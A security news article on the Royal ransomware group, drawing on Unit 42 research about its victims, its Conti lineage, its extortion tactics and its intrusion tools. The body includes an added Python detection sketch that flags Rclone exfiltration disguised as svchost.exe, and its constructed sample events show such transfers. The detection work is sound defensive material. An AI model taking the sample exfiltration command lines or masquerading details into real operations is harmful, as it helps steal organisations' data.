Royal ransomware gang quickly expands reign

The Royal ransomware group is aptly named. There’s an air of superiority in the way it taunts its victims. Royal’s members are the cream of the cybercriminal crop, and they know it.

The group’s swagger is evident in a README.txt ransom note dropped on one of its victims and obtained by Palo Alto Networks’ Unit 42.

“Most likely what happened was that you decided to save some money on your security infrastructure,” the note reads. “Alas, as a result your critical data was not only encrypted but also copied from your systems.”

Royal has become increasingly active this year, using a wide variety of tools as it aggressively targets critical infrastructure organizations.

In a post published Tuesday, Unit 42 says that according to Royal’s leak site, the group has been responsible for impacting 157 organizations since its inception last year.

“Royal ransomware has impacted a variety of industries, including small businesses and large corporations alike. Based on information from their leak site and public reporting outlets, we can see that Royal ransomware has impacted industries such as manufacturing, as well as wholesale and retail,” researchers wrote.

A focus on critical infrastructure

Over a period of a few months last year, the group boasted it impacted 14 manufacturing organizations. It has claimed to have further targeted 26 manufacturing organizations so far this year.

Royal has hit eight healthcare organizations since its inception, with the U.S. Department of Health and Human Services issuing a warning in January about the threat its ransomware posed to the healthcare sector.

There have also been seven strikes against local government entities in the U.S. and Europe, including its recent attack on the city of Dallas.

And it has impacted 14 organizations in the education sector, including school districts and universities, with four of those institutions hit in the first few days of this month alone.

Most of Royal’s victims (64%) are in the U.S., with Canadian organizations being its second most popular target (9%).

The breadth of Royal’s attacks to date “demonstrates the potential for broader and more severe consequences,” Unit 42 warns.

Operatives with years of experience

While Royal was first observed compromising systems and using multi-extortion to pressure victims in September 2022, it was linked to a previous ransomware family named Zeon, which surfaced nine months earlier.

Unit 42 researchers say it’s likely most members of Royal are former operatives of the Conti ransomware group.

“Because some of the people behind this threat were part of the development of Ryuk, which is the predecessor of Conti, they have many years of experience. This means they have a solid base for carrying out attacks and know what works when extorting victims,” according to Unit 42.

Royal has been known to demand ransoms of up to $25 million in bitcoin and the group’s tactics include leveraging its leak site to publicly extort victims into paying up.

“The Royal group will harass victims until the payment is secured, using techniques such as emailing victims and mass-printing ransom notes,” researchers said.

The group was active on Twitter until its account was suspended recently. It often used the platform to announce its compromises, tagging the victim in its posts.

“It’s not unusual to see threat actor groups create social media accounts to keep spreading their brand and announcements. It’s clear that this group is trying to get attention from multiple organizations through any means necessary,” Unit 42 says.

Unlike major ransomware groups such as LockBit 3.0, which typically operate a ransomware-as-a-service scheme, hiring affiliates and promoting their RaaS model, Unit 42 says it has not observed Royal taking that approach.

Elements of the Royal infection chain

The group has been observed using multiple initial access vectors to secure access into vulnerable systems, including callback phishing, SEO poisoning, exposed Remote Desktop Protocol accounts and compromised credentials.

Once access is secured, the group uses multiple tools to support the intrusion operation, including the TCP/UDP tunnel Chisel and the Active Directory query tool AdFind.

Royal has been observed compromising victims through a BATLOADER infection, which threat actors usually spread through SEO poisoning. BATLOADER will then attempt to download further payloads to the infected machine, such as VidarStealer, Ursnif/ISFB and Redline Stealer, along with legitimate tooling such as the system management tool NSudo and the Syncro remote monitoring and management (RMM) tool. Most importantly, BATLOADER has been seen loading Cobalt Strike, often a precursor to ransomware distribution.

Unit 42 researchers have observed Royal operators using PowerTool, a piece of software that has access to the kernel and is ideal for removing endpoint security software. The operators have also been observed executing batch scripts to disable security-related services, and deleting shadow file copies and logs after successful exfiltration.

Lateral movement through victims’ systems

Royal uses the network discovery software NetScan to identify and map out various connected computer resources such as other user targets and shares. It has also been observed using PsExec to conduct lateral movement within the infected environments.

Like other ransomware operators, it uses popular legitimate remote management software to maintain access to the infected environment. The use of Cobalt Strike and related beacons was also observed for command-and-control.

“An interesting observation of a tool used for maintaining access was the use of Chisel, a TCP/UDP tunneling tool written in Golang,” Unit 42 says.

“[We] observed Royal threat actors using Rclone, a legitimate tool to manage files between two systems, for exfiltrating stolen data before the deployment of ransomware. We found Rclone deployed in folders such as ProgramData, or renamed and masquerading in other folders. One popular filename used was svchost.exe,” researchers wrote.

As well as targeting Windows systems, Royal has expanded its arsenal by developing an ELF variant to impact Linux and ESXi environments.
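For defenders, the Rclone masquerading described above maps to two checks on process-creation telemetry: an `svchost.exe` image outside the Windows system directories, and a command line shaped like an Rclone transfer regardless of the binary's name. The sketch below is an added example, not code from Unit 42 or the article; the event field names (`image`, `command_line`), the rule names, the assumption that Windows lives on `C:`, and the sample events are all constructed for illustration.

```python
import ntpath
import re

# Assumption: Windows is installed on C:, so genuine svchost.exe lives only here.
LEGIT_SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Real rclone subcommands and flags that show up in bulk transfers.
RCLONE_VERBS = {"copy", "copyto", "sync", "move"}
RCLONE_FLAGS = ("--config", "--transfers", "--max-age", "--no-check-certificate")
# "name:path" remote spec; two or more chars before ':' rules out drive letters.
REMOTE_SPEC = re.compile(r"^[a-z][\w-]+:(?!//)")


def findings(event):
    """Return the rule names triggered by one process-creation event."""
    directory, name = ntpath.split(event["image"].lower())
    tokens = event["command_line"].lower().split()
    hits = []
    if name == "svchost.exe" and directory not in LEGIT_SVCHOST_DIRS:
        hits.append("svchost-outside-system-dir")
    has_verb = any(t in RCLONE_VERBS for t in tokens)
    has_flag = any(t.startswith(RCLONE_FLAGS) for t in tokens)
    has_remote = any(REMOTE_SPEC.match(t) for t in tokens)
    # A bare "copy" (e.g. cmd /c copy) is not enough; require a flag or remote.
    if has_verb and (has_flag or has_remote):
        hits.append("rclone-like-cmdline")
    # ProgramData is only a corroborating tag: plenty of legitimate software runs there.
    if hits and directory.startswith(r"c:\programdata"):
        hits.append("in-programdata")
    return hits


# Constructed sample events (not taken from any real incident).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"image": r"C:\ProgramData\svchost.exe",
     "command_line": r"C:\ProgramData\svchost.exe copy \\fs01\finance remote1:backup --transfers 16"},
    {"image": r"C:\Users\Public\Music\svchost.exe",
     "command_line": r"C:\Users\Public\Music\svchost.exe --config C:\Users\Public\r.conf sync D:\Shares remote1:x"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c copy a.txt b.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["image"], "->", findings(ev) or "clean")
```

Administrators who run Rclone for backups will trigger the command-line rule, so pair it with an allowlist of expected hosts and service accounts.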

Simon Hendery

Simon Hendery is a freelance IT consultant specializing in security, compliance, and enterprise workflows. With a background in technology journalism and marketing, he is a passionate storyteller who loves researching and sharing the latest industry developments.